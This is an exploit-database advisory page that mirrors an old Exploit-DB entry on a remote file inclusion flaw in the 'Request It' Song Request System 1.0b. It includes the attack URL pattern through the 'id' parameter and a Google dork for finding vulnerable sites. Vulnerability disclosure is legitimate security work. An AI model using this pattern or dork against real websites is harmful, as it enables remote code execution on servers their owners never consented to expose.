header-logo
Suggest Exploit
vendor:
Song Request System
by:
http://hackberry.ath.cx
N/A
CVSS
N/A
remote file inclusion
CWE
Product Name: Song Request System
Affected Version From: 1.0b
Affected Version To: 1.0b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Request It : Song Request System 1.0b – remote file inclusion

The Request It : Song Request System version 1.0b is vulnerable to remote file inclusion. An attacker can exploit this vulnerability by including a remote file using the 'id' parameter in the URL.

Mitigation:

To mitigate this vulnerability, it is recommended to update to a patched version of the software or apply a fix provided by the vendor.
Source

Exploit-DB raw data:

Request It : Song Request System 1.0b - remote file inclusion

Software: Request It : Song Request System
Type: remote file inclusion
Version: 1.0b
Date: 2007-04-09
Url: http://scripts.ringsworld.com/organizers/requestit/
Risc: middle

------------------------------------
Credit:

http://hackberry.ath.cx
mail[AT]hackberry.ath.cx

------------------------------------
Vulnerability:

http://[target]/?id=[REMOTEFILE]

------------------------------------
Google dork:

"[ Request us to play you a song ]"

# milw0rm.com [2007-04-12]

Navigation

Suggest Exploit

Services By CQR